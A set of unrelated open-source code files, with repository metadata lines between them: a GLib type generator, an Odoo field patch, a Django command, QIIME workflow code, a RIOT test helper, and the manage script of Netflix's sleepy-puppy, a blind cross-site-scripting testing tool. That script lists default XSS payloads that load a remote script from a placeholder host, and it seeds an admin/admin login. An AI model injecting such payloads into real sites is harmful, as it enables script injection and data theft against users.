self.d(' * Values (D-Bus type <literal>%s</literal>,\n'
% value.getAttribute('type'))
tp_type = value.getAttributeNS(NS_TP, 'type')
if tp_type:
self.d(' * type <literal>%s</literal>,\n' % tp_type)
self.d(' * named <literal>%s</literal>):\n'
% value.getAttribute('name'))
docstring = get_docstring(value) or '(Undocumented)'
self.d(' * %s\n' % xml_escape(docstring))
self.d(' *\n')
self.d(' */\n')
self.h('#define %s (%s ())\n\n' % (name, impl))
self.need_mappings[impl_sig] = esc_impl_sig
array_name = mapping.getAttribute('array-name')
if array_name:
gtype_name = self.PREFIX_ + 'ARRAY_TYPE_' + array_name.upper()
contents_sig = 'a{' + impl_sig + '}'
esc_contents_sig = escape_as_identifier(contents_sig)
impl = self.prefix_ + 'type_dbus_array_of_' + esc_contents_sig
self.d('/**\n * %s:\n\n' % gtype_name)
self.d(' * Expands to a call to a function\n')
self.d(' * that returns the #GType of a #GPtrArray\n')
self.d(' * of #%s.\n' % name)
self.d(' */\n\n')
self.h('#define %s (%s ())\n\n' % (gtype_name, impl))
self.need_other_arrays[contents_sig] = esc_contents_sig
def do_struct_header(self, struct):
members = struct.getElementsByTagNameNS(NS_TP, 'member')
impl_sig = ''.join([elt.getAttribute('type') for elt in members])
esc_impl_sig = escape_as_identifier(impl_sig)
name = (self.PREFIX_ + 'STRUCT_TYPE_' +
struct.getAttribute('name').upper())
impl = self.prefix_ + 'type_dbus_struct_' + esc_impl_sig
docstring = struct.getElementsByTagNameNS(NS_TP, 'docstring')
if docstring:
docstring = docstring[0].toprettyxml()
if docstring.startswith('<tp:docstring>'):
docstring = docstring[14:]
if docstring.endswith('</tp:docstring>\n'):
docstring = docstring[:-16]
if docstring.strip() in ('<tp:docstring/>', ''):
docstring = '(Undocumented)'
else:
docstring = '(Undocumented)'
self.d('/**\n * %s:\n\n' % name)
self.d(' * %s\n' % xml_escape(docstring))
self.d(' *\n')
self.d(' * This macro expands to a call to a function\n')
self.d(' * that returns the #GType of a #GValueArray\n')
self.d(' * appropriate for representing a D-Bus struct\n')
self.d(' * with signature <literal>(%s)</literal>.\n'
% impl_sig)
self.d(' *\n')
for i, member in enumerate(members):
self.d(' * Member %d (D-Bus type '
'<literal>%s</literal>,\n'
% (i, member.getAttribute('type')))
tp_type = member.getAttributeNS(NS_TP, 'type')
if tp_type:
self.d(' * type <literal>%s</literal>,\n' % tp_type)
self.d(' * named <literal>%s</literal>):\n'
% member.getAttribute('name'))
docstring = get_docstring(member) or '(Undocumented)'
self.d(' * %s\n' % xml_escape(docstring))
self.d(' *\n')
self.d(' */\n\n')
self.h('#define %s (%s ())\n\n' % (name, impl))
array_name = struct.getAttribute('array-name')
if array_name != '':
array_name = (self.PREFIX_ + 'ARRAY_TYPE_' + array_name.upper())
impl = self.prefix_ + 'type_dbus_array_' + esc_impl_sig
self.d('/**\n * %s:\n\n' % array_name)
self.d(' * Expands to a call to a function\n')
self.d(' * that returns the #GType of a #GPtrArray\n')
self.d(' * of #%s.\n' % name)
self.d(' */\n\n')
self.h('#define %s (%s ())\n\n' % (array_name, impl))
self.need_struct_arrays[impl_sig] = esc_impl_sig
self.need_structs[impl_sig] = esc_impl_sig
def __call__(self):
mappings = self.dom.getElementsByTagNameNS(NS_TP, 'mapping')
structs = self.dom.getElementsByTagNameNS(NS_TP, 'struct')
for mapping in mappings:
self.do_mapping_header(mapping)
for sig in self.need_mappings:
self.h('GType %stype_dbus_hash_%s (void);\n\n' %
(self.prefix_, self.need_mappings[sig]))
self.c('GType\n%stype_dbus_hash_%s (void)\n{\n' %
(self.prefix_, self.need_mappings[sig]))
self.c(' static GType t = 0;\n\n')
self.c(' if (G_UNLIKELY (t == 0))\n')
# FIXME: translate sig into two GTypes
items = tuple(Signature(sig))
gtypes = types_to_gtypes(items)
self.c(' t = dbus_g_type_get_map ("GHashTable", '
'%s, %s);\n' % (gtypes[0], gtypes[1]))
self.c(' return t;\n')
self.c('}\n\n')
for struct in structs:
self.do_struct_header(struct)
for sig in self.need_structs:
self.h('GType %stype_dbus_struct_%s (void);\n\n' %
(self.prefix_, self.need_structs[sig]))
self.c('GType\n%stype_dbus_struct_%s (void)\n{\n' %
(self.prefix_, self.need_structs[sig]))
self.c(' static GType t = 0;\n\n')
self.c(' if (G_UNLIKELY (t == 0))\n')
self.c(' t = dbus_g_type_get_struct ("GValueArray",\n')
items = tuple(Signature(sig))
gtypes = types_to_gtypes(items)
for gtype in gtypes:
self.c(' %s,\n' % gtype)
self.c(' G_TYPE_INVALID);\n')
self.c(' return t;\n')
self.c('}\n\n')
for sig in self.need_struct_arrays:
self.h('GType %stype_dbus_array_%s (void);\n\n' %
(self.prefix_, self.need_struct_arrays[sig]))
self.c('GType\n%stype_dbus_array_%s (void)\n{\n' %
(self.prefix_, self.need_struct_arrays[sig]))
self.c(' static GType t = 0;\n\n')
self.c(' if (G_UNLIKELY (t == 0))\n')
self.c(' t = dbus_g_type_get_collection ("GPtrArray", '
'%stype_dbus_struct_%s ());\n' %
(self.prefix_, self.need_struct_arrays[sig]))
self.c(' return t;\n')
self.c('}\n\n')
for sig in self.need_other_arrays:
self.h('GType %stype_dbus_array_of_%s (void);\n\n' %
(self.prefix_, self.need_other_arrays[sig]))
self.c('GType\n%stype_dbus_array_of_%s (void)\n{\n' %
(self.prefix_, self.need_other_arrays[sig]))
self.c(' static GType t = 0;\n\n')
self.c(' if (G_UNLIKELY (t == 0))\n')
if sig[:2] == 'a{' and sig[-1:] == '}':
# array of mappings
self.c(' t = dbus_g_type_get_collection ('
'"GPtrArray", '
'%stype_dbus_hash_%s ());\n' %
(self.prefix_, escape_as_identifier(sig[2:-1])))
elif sig[:2] == 'a(' and sig[-1:] == ')':
# array of arrays of struct
self.c(' t = dbus_g_type_get_collection ('
'"GPtrArray", '
'%stype_dbus_array_%s ());\n' %
(self.prefix_, escape_as_identifier(sig[2:-1])))
elif sig[:1] == 'a':
# array of arrays of non-struct
self.c(' t = dbus_g_type_get_collection ('
'"GPtrArray", '
'%stype_dbus_array_of_%s ());\n' %
(self.prefix_, escape_as_identifier(sig[1:])))
else:
raise AssertionError("array of '%s' not supported" % sig)
self.c(' return t;\n')
self.c('}\n\n')
if __name__ == '__main__':
argv = sys.argv[1:]
dom = xml.dom.minidom.parse(argv[0])
GTypesGenerator(dom, argv[1], argv[2])()
| JGulic/empathy | tools/glib-gtypes-generator.py | Python | gpl-2.0 | 12,522 |
# -*- coding: utf-8 -*-
import json
from odoo import fields
def monkey_patch(cls):
""" Return a method decorator to monkey-patch the given class. """
def decorate(func):
name = func.__name__
func.super = getattr(cls, name, None)
setattr(cls, name, func)
return func
return decorate
#
# Implement sparse fields by monkey-patching fields.Field
#
fields.Field.__doc__ += """
.. _field-sparse:
.. rubric:: Sparse fields
Sparse fields have a very small probability of being not null. Therefore
many such fields can be serialized compactly into a common location, the
latter being a so-called "serialized" field.
:param sparse: the name of the field where the value of this field must
be stored.
"""
@monkey_patch(fields.Field)
def _get_attrs(self, model, name):
attrs = _get_attrs.super(self, model, name)
if attrs.get('sparse'):
# by default, sparse fields are not stored and not copied
attrs['store'] = False
attrs['copy'] = attrs.get('copy', False)
attrs['compute'] = self._compute_sparse
if not attrs.get('readonly'):
attrs['inverse'] = self._inverse_sparse
return attrs
@monkey_patch(fields.Field)
def _compute_sparse(self, records):
for record in records:
values = record[self.sparse]
record[self.name] = values.get(self.name)
if self.relational:
for record in records:
record[self.name] = record[self.name].exists()
@monkey_patch(fields.Field)
def _inverse_sparse(self, records):
for record in records:
values = record[self.sparse]
value = self.convert_to_read(record[self.name], record, use_name_get=False)
if value:
if values.get(self.name) != value:
values[self.name] = value
record[self.sparse] = values
else:
if self.name in values:
values.pop(self.name)
record[self.sparse] = values
#
# Definition and implementation of serialized fields
#
class Serialized(fields.Field):
""" Serialized fields provide the storage for sparse fields. """
type = 'serialized'
_slots = {
'prefetch': False, # not prefetched by default
}
column_type = ('text', 'text')
def convert_to_column(self, value, record, values=None):
return json.dumps(value)
def convert_to_cache(self, value, record, validate=True):
# cache format: dict
value = value or {}
return value if isinstance(value, dict) else json.loads(value)
fields.Serialized = Serialized
| Aravinthu/odoo | addons/base_sparse_field/models/fields.py | Python | agpl-3.0 | 2,668 |
#!/usr/bin/env python
# Copyright 2015 Netflix, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import getpass
import os
from flask_script.commands import ShowUrls, Clean
from flask.ext.script import Manager
from flask.ext.migrate import Migrate, MigrateCommand
from sleepypuppy.admin.admin.models import Administrator
from sleepypuppy import app, db
from js_strings import default_script, alert_box, console_log, default_without_screenshot, generic_collector
manager = Manager(app)
migrate = Migrate(app, db)
manager.add_command('db', MigrateCommand)
@manager.shell
def make_shell_context():
"""
Creates a python REPL with several default imports
in the context of the app
"""
return dict(app=app)
@manager.command
def create_db():
"""
Creates a database with all of the tables defined in
your Alchemy models
"""
db.create_all()
@manager.command
def drop_db():
"""
Drops a database with all of the tables defined in
your Alchemy models
"""
db.drop_all()
@manager.command
def create_login(login):
"""
Seed the database with an admin user.
"""
print 'creating admin user'
if Administrator.query.filter_by(login=login).count():
print 'user already exists!'
return
# Check env for credentials (used by docker)
docker_admin_pass = os.getenv('DOCKER_ADMIN_PASS', None)
if docker_admin_pass:
admin_user = Administrator(login=login, password=docker_admin_pass)
else:
# else, ask on stdin:
while True:
print "{}, enter your password!\n ".format(login)
pw1 = getpass.getpass()
pw2 = getpass.getpass(prompt="Confirm: ")
if pw1 == pw2:
admin_user = Administrator(login=login, password=pw1)
break
else:
print 'passwords do not match!'
db.session.add(admin_user)
db.session.commit()
print 'user: ' + login + ' created!'
@manager.command
def default_login():
"""
Seed the database with some inital values
"""
existing_admin = Administrator.query.filter(
Administrator.login == 'admin').first()
if existing_admin:
print "Admin account (admin) already exists, skipping."
else:
admin_user = Administrator(login='admin', password='admin')
print 'user: ' + 'admin' + ' created!'
db.session.add(admin_user)
db.session.commit()
return
from collections import namedtuple
DefaultPayload = namedtuple(
'DefaultPayload', ['payload', 'notes', 'snooze', 'run_once'])
DEFAULT_PAYLOADS = [
DefaultPayload('<script src=$1></script>', None, False, False),
DefaultPayload('</script><script src=$1>', None, False, False),
DefaultPayload(
'<script src=$1></script>', None, False, False),
DefaultPayload('</script><script src=$1>',
None, False, False),
DefaultPayload('''" onload="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);" garbage="''', None, False, False), # noqa
DefaultPayload("""'"><img src=x onerror="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);">""", None, False, False), # noqa
DefaultPayload("""Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 '"><img src=x onerror="var s=document.createElement('script');s.src='$1';document.getElementsByTagName('head')[0].appendChild(s);">""", None, False, False) # noqa
]
DefaultPuppyscript = namedtuple('DefaultPuppyscript', ['name', 'code', 'notes'])
DEFAULT_JAVASCRIPTS = [
DefaultPuppyscript('Default', default_script,
'Default collects metadata for capture table including a screenshot'),
DefaultPuppyscript('Default Without Screenshot', default_without_screenshot,
'Generating a screenshot can be CPU intensive and even in some cases cause browser instability, so for some assessments this may be a better option. '),
DefaultPuppyscript(
'Alert Box', alert_box, 'Generates an alert box for notification purposes'),
DefaultPuppyscript(
'Console Log', console_log, 'Log a message in the browser\'s console'),
DefaultPuppyscript('Generic Collector: IP Address', generic_collector,
'Example showing how you can create generic JavaScripts for collecting any text data you choose. In this example we use ajax to determine IP address and record the value. ')
]
@manager.command
def create_bootstrap_assessment(name="General", add_default_payloads=True):
"""
Creates an assessment and attaches a few default payloads.
"""
from sleepypuppy.admin.assessment.models import Assessment
from sleepypuppy.admin.payload.models import Payload
from sleepypuppy.admin.puppyscript.models import Puppyscript
assessment = Assessment.query.filter(Assessment.name == name).first()
if assessment:
print("Assessment with name", name, "already exists, exiting.")
return
else:
assessment = Assessment(
name=name, access_log_enabled=False, snooze=False, run_once=False)
# add assessment
db.session.add(assessment)
db.session.commit()
existing_payload = Payload.query.filter(Payload.id == 1).first()
if existing_payload:
print("Payloads already exists, exiting.")
else:
if add_default_payloads:
for payload in DEFAULT_PAYLOADS:
payload = Payload(
payload=payload.payload,
notes=payload.notes,
ordering=u'1'
)
db.session.add(payload)
db.session.commit()
existing_puppyscript = Puppyscript.query.filter(Puppyscript.id == 1).first()
if existing_puppyscript:
print("Puppyscripts already exists, exiting.")
else:
for puppyscript in DEFAULT_JAVASCRIPTS:
puppyscript = Puppyscript(
name=puppyscript.name,
code=puppyscript.code,
notes=puppyscript.notes
)
db.session.add(puppyscript)
db.session.commit()
@manager.command
def setup_sleepy_puppy():
create_db()
create_bootstrap_assessment()
create_login('admin')
@manager.command
def list_routes():
func_list = {}
for rule in app.url_map.iter_rules():
if rule.endpoint != 'static':
func_list[rule.rule] = app.view_functions[rule.endpoint].__doc__
from pprint import pprint
pprint(func_list)
if __name__ == "__main__":
manager.add_command("clean", Clean())
manager.add_command("show_urls", ShowUrls())
manager.run()
| Netflix/sleepy-puppy | manage.py | Python | apache-2.0 | 7,364 |
# encoding: utf-8
from django.core.management.base import NoArgsCommand
from optparse import make_option
from video.management.commands.sub_commands.AddVideo import AddVideo
class Command(NoArgsCommand):
option_list = NoArgsCommand.option_list + (
make_option('--video-link',action='store',dest='video-link',
help="link to the video, use --list-types to see a list of supported link types"),
make_option('--list-types',action='store_true',dest='list-types',
help="list supported video link types and formats"),
make_option('--object-type',action='store',dest='object-type',
help="set the object type, currently only member is supported"),
make_option('--object-id',action='store',dest='object-id',
help="set the object id that the video will be related to"),
make_option('--sticky',action='store_true',dest='is_sticky',
help="set the video as sticky"),
)
def handle_noargs(self, **options):
if options.get('list-types',False):
print """Supported link formats:
youtube - http://www.youtube.com/watch?v=2sASREICzqY"""
else:
av=AddVideo(options)
av.run()
print av.ans
| noamelf/Open-Knesset | video/management/commands/add_video.py | Python | bsd-3-clause | 1,246 |
#!/usr/bin/env python
# File created on 20 Feb 2013
from __future__ import division
__author__ = "Greg Caporaso"
__copyright__ = "Copyright 2011, The QIIME project"
__credits__ = ["Greg Caporaso", "Kyle Bittinger", "Justin Kuczynski",
"Jai Ram Rideout"]
__license__ = "GPL"
__version__ = "1.9.1-dev"
__maintainer__ = "Greg Caporaso"
__email__ = "[email protected]"
from os.path import split, splitext, abspath
from qiime.util import create_dir
from qiime.workflow.util import (print_to_stdout,
generate_log_fp,
WorkflowLogger,
log_input_md5s,
get_params_str)
def run_pick_de_novo_otus(input_fp,
output_dir,
command_handler,
params,
qiime_config,
parallel=False,
logger=None,
suppress_md5=False,
status_update_callback=print_to_stdout):
""" Run the data preparation steps of Qiime
The steps performed by this function are:
1) Pick OTUs;
2) Pick a representative set;
3) Align the representative set;
4) Assign taxonomy;
5) Filter the alignment prior to tree building - remove positions
which are all gaps, and specified as 0 in the lanemask
6) Build a phylogenetic tree;
7) Build an OTU table.
"""
# Prepare some variables for the later steps
input_dir, input_filename = split(input_fp)
input_basename, input_ext = splitext(input_filename)
create_dir(output_dir)
commands = []
cluster_failures = False
if logger is None:
logger = WorkflowLogger(generate_log_fp(output_dir),
params=params,
qiime_config=qiime_config)
close_logger_on_success = True
else:
close_logger_on_success = False
if not suppress_md5:
log_input_md5s(logger, [input_fp])
# Prep the OTU picking command
try:
otu_picking_method = params['pick_otus']['otu_picking_method']
except KeyError:
otu_picking_method = 'uclust'
pick_otu_dir = '%s/%s_picked_otus' % (output_dir, otu_picking_method)
otu_fp = '%s/%s_otus.txt' % (pick_otu_dir, input_basename)
if parallel and (otu_picking_method == 'blast' or
otu_picking_method == 'uclust_ref'):
# Grab the parallel-specific parameters
try:
params_str = get_params_str(params['parallel'])
except KeyError:
params_str = ''
# Grab the OTU picker parameters
try:
# Want to find a cleaner strategy for this: the parallel script
# is method-specific, so doesn't take a --otu_picking_method
# option. This works for now though.
d = params['pick_otus'].copy()
del d['otu_picking_method']
except KeyError:
pass
if otu_picking_method == 'uclust_ref':
try:
suppress_new_clusters = d['suppress_new_clusters']
del d['suppress_new_clusters']
cluster_failures = False
except KeyError:
cluster_failures = True
failure_otu_picking_method = 'uclust'
params_str += ' %s' % get_params_str(d)
otu_picking_script = 'parallel_pick_otus_%s.py' % otu_picking_method
# Build the OTU picking command
pick_otus_cmd = '%s -i %s -o %s -T %s' % (otu_picking_script,
input_fp,
pick_otu_dir,
params_str)
else:
try:
params_str = get_params_str(params['pick_otus'])
except KeyError:
params_str = ''
# Build the OTU picking command
pick_otus_cmd = 'pick_otus.py -i %s -o %s %s' %\
(input_fp, pick_otu_dir, params_str)
commands.append([('Pick OTUs', pick_otus_cmd)])
if cluster_failures:
reference_otu_fp = otu_fp
clustered_failures_dir = '%s/failure_otus/' % pick_otu_dir
try:
d = params['pick_otus'].copy()
del d['otu_picking_method']
except KeyError:
pass
if 'denovo_otu_id_prefix' not in d:
d['denovo_otu_id_prefix'] = 'DeNovoOTU'
params_str = ' %s' % get_params_str(d)
failures_list_fp = '%s/%s_failures.txt' % \
(pick_otu_dir, input_basename)
failures_fasta_fp = '%s/%s_failures.fasta' % \
(pick_otu_dir, input_basename)
filter_fasta_cmd = 'filter_fasta.py -f %s -s %s -o %s' %\
(input_fp, failures_list_fp, failures_fasta_fp)
commands.append([('Generate failures fasta file',
filter_fasta_cmd)])
# Prep the OTU picking command for
failure_otu_fp = '%s/%s_failures_otus.txt' % (clustered_failures_dir,
input_basename)
# Build the OTU picking command
pick_otus_cmd = 'pick_otus.py -i %s -o %s -m %s %s' %\
(failures_fasta_fp, clustered_failures_dir,
failure_otu_picking_method, params_str)
commands.append(
[('Pick de novo OTUs for new clusters', pick_otus_cmd)])
merged_otu_map_fp = '%s/merged_otu_map.txt' % clustered_failures_dir
cat_otu_tables_cmd = 'cat %s %s >> %s' %\
(reference_otu_fp, failure_otu_fp, merged_otu_map_fp)
commands.append([('Merge OTU maps', cat_otu_tables_cmd)])
otu_fp = merged_otu_map_fp
# Prep the representative set picking command
rep_set_dir = '%s/rep_set/' % output_dir
create_dir(rep_set_dir)
rep_set_fp = '%s/%s_rep_set.fasta' % (rep_set_dir, input_basename)
rep_set_log_fp = '%s/%s_rep_set.log' % (rep_set_dir, input_basename)
try:
params_str = get_params_str(params['pick_rep_set'])
except KeyError:
params_str = ''
# Build the representative set picking command
pick_rep_set_cmd = 'pick_rep_set.py -i %s -f %s -l %s -o %s %s' %\
(otu_fp, input_fp, rep_set_log_fp, rep_set_fp, params_str)
commands.append([('Pick representative set', pick_rep_set_cmd)])
# Prep the taxonomy assignment command
try:
assignment_method = params['assign_taxonomy']['assignment_method']
except KeyError:
assignment_method = 'uclust'
assign_taxonomy_dir = '%s/%s_assigned_taxonomy' %\
(output_dir, assignment_method)
taxonomy_fp = '%s/%s_rep_set_tax_assignments.txt' % \
(assign_taxonomy_dir, input_basename)
if parallel and (assignment_method == 'rdp' or
assignment_method == 'blast' or
assignment_method == 'uclust'):
# Grab the parallel-specific parameters
try:
params_str = get_params_str(params['parallel'])
except KeyError:
params_str = ''
# Grab the taxonomy assignment parameters
try:
# Want to find a cleaner strategy for this: the parallel script
# is method-specific, so doesn't take a --assignment_method
# option. This works for now though.
d = params['assign_taxonomy'].copy()
if 'assignment_method' in d:
del d['assignment_method']
params_str += ' %s' % get_params_str(d)
except KeyError:
pass
# Build the parallel taxonomy assignment command
assign_taxonomy_cmd = \
'parallel_assign_taxonomy_%s.py -i %s -o %s -T %s' %\
(assignment_method, rep_set_fp, assign_taxonomy_dir, params_str)
else:
try:
params_str = get_params_str(params['assign_taxonomy'])
except KeyError:
params_str = ''
# Build the taxonomy assignment command
assign_taxonomy_cmd = 'assign_taxonomy.py -o %s -i %s %s' %\
(assign_taxonomy_dir, rep_set_fp, params_str)
commands.append([('Assign taxonomy', assign_taxonomy_cmd)])
# Prep the OTU table building command
otu_table_fp = '%s/otu_table.biom' % output_dir
try:
params_str = get_params_str(params['make_otu_table'])
except KeyError:
params_str = ''
# Build the OTU table building command
make_otu_table_cmd = 'make_otu_table.py -i %s -t %s -o %s %s' %\
(otu_fp, taxonomy_fp, otu_table_fp, params_str)
commands.append([('Make OTU table', make_otu_table_cmd)])
if cluster_failures:
reference_otu_table_fp = '%s/reference_only_otu_table.biom' % output_dir
# Build the OTU table building command
make_otu_table_cmd = 'make_otu_table.py -i %s -t %s -o %s %s' %\
(reference_otu_fp, taxonomy_fp, reference_otu_table_fp, params_str)
commands.append(
[('Make reference-only OTU table', make_otu_table_cmd)])
# Prep the pynast alignment command
try:
alignment_method = params['align_seqs']['alignment_method']
except KeyError:
alignment_method = 'pynast'
pynast_dir = '%s/%s_aligned_seqs' % (output_dir, alignment_method)
aln_fp = '%s/%s_rep_set_aligned.fasta' % (pynast_dir, input_basename)
if parallel and alignment_method == 'pynast':
# Grab the parallel-specific parameters
try:
params_str = get_params_str(params['parallel'])
except KeyError:
params_str = ''
# Grab the alignment parameters
# Want to find a cleaner strategy for this: the parallel script
# is method-specific, so doesn't take a --alignment_method
# option. This works for now though.
try:
d = params['align_seqs'].copy()
except KeyError:
d = {}
try:
del d['alignment_method']
except KeyError:
pass
params_str += ' %s' % get_params_str(d)
# Build the parallel pynast alignment command
align_seqs_cmd = 'parallel_align_seqs_pynast.py -i %s -o %s -T %s' %\
(rep_set_fp, pynast_dir, params_str)
else:
try:
params_str = get_params_str(params['align_seqs'])
except KeyError:
params_str = ''
# Build the pynast alignment command
align_seqs_cmd = 'align_seqs.py -i %s -o %s %s' %\
(rep_set_fp, pynast_dir, params_str)
commands.append([('Align sequences', align_seqs_cmd)])
# Prep the alignment filtering command
filtered_aln_fp = '%s/%s_rep_set_aligned_pfiltered.fasta' %\
(pynast_dir, input_basename)
try:
params_str = get_params_str(params['filter_alignment'])
except KeyError:
params_str = ''
# Build the alignment filtering command
filter_alignment_cmd = 'filter_alignment.py -o %s -i %s %s' %\
(pynast_dir, aln_fp, params_str)
commands.append([('Filter alignment', filter_alignment_cmd)])
# Prep the tree building command
tree_fp = '%s/rep_set.tre' % output_dir
try:
params_str = get_params_str(params['make_phylogeny'])
except KeyError:
params_str = ''
# Build the tree building command
make_phylogeny_cmd = 'make_phylogeny.py -i %s -o %s %s' %\
(filtered_aln_fp, tree_fp, params_str)
commands.append([('Build phylogenetic tree', make_phylogeny_cmd)])
# Call the command handler on the list of commands
command_handler(commands,
status_update_callback,
logger=logger,
close_logger_on_success=close_logger_on_success)
return abspath(tree_fp), abspath(otu_table_fp)
run_qiime_data_preparation = run_pick_otus_through_otu_table = run_pick_de_novo_otus
def run_pick_closed_reference_otus(
input_fp,
refseqs_fp,
output_dir,
taxonomy_fp,
command_handler,
params,
qiime_config,
assign_taxonomy=False,
parallel=False,
logger=None,
suppress_md5=False,
status_update_callback=print_to_stdout):
""" Run the data preparation steps of Qiime
The steps performed by this function are:
1) Pick OTUs;
2) If assignment_taxonomy is True, choose representative sequence
for OTUs and assign taxonomy using a classifier.
3) Build an OTU table with optional predefined taxonomy
(if assign_taxonomy=False) or taxonomic assignments from step 2
(if assign_taxonomy=True).
"""
# confirm that a valid otu picking method was supplied before doing
# any work
reference_otu_picking_methods = ['blast', 'uclust_ref', 'usearch61_ref',
'usearch_ref', 'sortmerna']
try:
otu_picking_method = params['pick_otus']['otu_picking_method']
except KeyError:
otu_picking_method = 'uclust_ref'
assert otu_picking_method in reference_otu_picking_methods,\
"Invalid OTU picking method supplied: %s. Valid choices are: %s"\
% (otu_picking_method, ' '.join(reference_otu_picking_methods))
# Prepare some variables for the later steps
input_dir, input_filename = split(input_fp)
input_basename, input_ext = splitext(input_filename)
create_dir(output_dir)
commands = []
if logger is None:
logger = WorkflowLogger(generate_log_fp(output_dir),
params=params,
qiime_config=qiime_config)
close_logger_on_success = True
else:
close_logger_on_success = False
if not suppress_md5:
log_input_md5s(logger, [input_fp, refseqs_fp, taxonomy_fp])
# Prep the OTU picking command
pick_otu_dir = '%s/%s_picked_otus' % (output_dir, otu_picking_method)
otu_fp = '%s/%s_otus.txt' % (pick_otu_dir, input_basename)
if parallel and (otu_picking_method == 'blast' or
otu_picking_method == 'uclust_ref' or
otu_picking_method == 'usearch61_ref' or
otu_picking_method == 'sortmerna'):
# Grab the parallel-specific parameters
try:
params_str = get_params_str(params['parallel'])
except KeyError:
params_str = ''
# Grab the OTU picker parameters
try:
# Want to find a cleaner strategy for this: the parallel script
# is method-specific, so doesn't take a --alignment_method
# option. This works for now though.
d = params['pick_otus'].copy()
if 'otu_picking_method' in d:
del d['otu_picking_method']
params_str += ' %s' % get_params_str(d)
except KeyError:
pass
otu_picking_script = 'parallel_pick_otus_%s.py' % otu_picking_method
# Build the OTU picking command
pick_otus_cmd = '%s -i %s -o %s -r %s -T %s' %\
(otu_picking_script,
input_fp,
pick_otu_dir,
refseqs_fp,
params_str)
else:
try:
params_str = get_params_str(params['pick_otus'])
except KeyError:
params_str = ''
# Since this is reference-based OTU picking we always want to
# suppress new clusters -- force it here.
params_str += ' --suppress_new_clusters'
logger.write(
"Forcing --suppress_new_clusters as this is "
"closed-reference OTU picking.\n\n")
# Build the OTU picking command
pick_otus_cmd = 'pick_otus.py -i %s -o %s -r %s -m %s %s' %\
(input_fp,
pick_otu_dir,
refseqs_fp,
otu_picking_method,
params_str)
commands.append([('Pick OTUs', pick_otus_cmd)])
# Assign taxonomy using a taxonomy classifier, if request by the user.
# (Alternatively predefined taxonomic assignments will be used, if provided.)
if assign_taxonomy:
# Prep the representative set picking command
rep_set_dir = '%s/rep_set/' % output_dir
create_dir(rep_set_dir)
rep_set_fp = '%s/%s_rep_set.fasta' % (rep_set_dir, input_basename)
rep_set_log_fp = '%s/%s_rep_set.log' % (rep_set_dir, input_basename)
try:
params_str = get_params_str(params['pick_rep_set'])
except KeyError:
params_str = ''
# Build the representative set picking command
pick_rep_set_cmd = 'pick_rep_set.py -i %s -f %s -l %s -o %s %s' %\
(otu_fp, input_fp, rep_set_log_fp, rep_set_fp, params_str)
commands.append([('Pick representative set', pick_rep_set_cmd)])
# Prep the taxonomy assignment command
try:
assignment_method = params['assign_taxonomy']['assignment_method']
except KeyError:
assignment_method = 'uclust'
assign_taxonomy_dir = '%s/%s_assigned_taxonomy' %\
(output_dir, assignment_method)
taxonomy_fp = '%s/%s_rep_set_tax_assignments.txt' % \
(assign_taxonomy_dir, input_basename)
if parallel and (assignment_method == 'rdp' or
assignment_method == 'blast' or
assignment_method == 'uclust'):
# Grab the parallel-specific parameters
try:
params_str = get_params_str(params['parallel'])
except KeyError:
params_str = ''
# Grab the taxonomy assignment parameters
try:
# Want to find a cleaner strategy for this: the parallel script
# is method-specific, so doesn't take a --assignment_method
# option. This works for now though.
d = params['assign_taxonomy'].copy()
if 'assignment_method' in d:
del d['assignment_method']
params_str += ' %s' % get_params_str(d)
except KeyError:
pass
# Build the parallel taxonomy assignment command
assign_taxonomy_cmd = \
'parallel_assign_taxonomy_%s.py -i %s -o %s -T %s' %\
(assignment_method, rep_set_fp, assign_taxonomy_dir, params_str)
else:
try:
params_str = get_params_str(params['assign_taxonomy'])
except KeyError:
params_str = ''
# Build the taxonomy assignment command
assign_taxonomy_cmd = 'assign_taxonomy.py -o %s -i %s %s' %\
(assign_taxonomy_dir, rep_set_fp, params_str)
commands.append([('Assign taxonomy', assign_taxonomy_cmd)])
# Prep the OTU table building command
otu_table_fp = '%s/otu_table.biom' % output_dir
try:
params_str = get_params_str(params['make_otu_table'])
except KeyError:
params_str = ''
# If assign_taxonomy is True, this will be the path to the taxonomic
# assignment results. If assign_taxonomy is False this will be either
# the precomputed taxonomic assignments that the user passed in,
# or None.
if taxonomy_fp:
taxonomy_str = '-t %s' % taxonomy_fp
else:
taxonomy_str = ''
# Build the OTU table building command
make_otu_table_cmd = 'make_otu_table.py -i %s %s -o %s %s' %\
(otu_fp, taxonomy_str, otu_table_fp, params_str)
commands.append([('Make OTU table', make_otu_table_cmd)])
# Call the command handler on the list of commands
command_handler(commands,
status_update_callback,
logger=logger,
close_logger_on_success=close_logger_on_success)
run_pick_reference_otus_through_otu_table = run_pick_closed_reference_otus
| adamrp/qiime | qiime/workflow/upstream.py | Python | gpl-2.0 | 19,937 |
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2016 Martine Lenders <[email protected]>
#
# Distributed under terms of the MIT license.
from __future__ import print_function
import os
import sys
import random
import subprocess
import time
import types
import pexpect
DEFAULT_TIMEOUT = 5
class Strategy(object):
def __init__(self, func=None):
if func is not None:
if sys.version_info < (3,):
self.__class__.execute = types.MethodType(func, self, self.__class__)
else:
self.__class__.execute = types.MethodType(func, self)
def execute(self, *args, **kwargs):
raise NotImplementedError()
class ApplicationStrategy(Strategy):
def __init__(self, app_dir=os.getcwd(), func=None):
super(ApplicationStrategy, self).__init__(func)
self.app_dir = app_dir
class BoardStrategy(Strategy):
def __init__(self, board, func=None):
super(BoardStrategy, self).__init__(func)
self.board = board
def __run_make(self, application, make_targets, env=None):
env = os.environ.copy()
if env is not None:
env.update(env)
env.update(self.board.to_env())
cmd = ("make", "-C", application) + make_targets
print(' '.join(cmd))
print(subprocess.check_output(cmd, env=env))
def execute(self, application):
super(BoardStrategy, self).execute(application)
class CleanStrategy(BoardStrategy):
def execute(self, application, env=None):
super(CleanStrategy, self).__run_make(application, ("-B", "clean"), env)
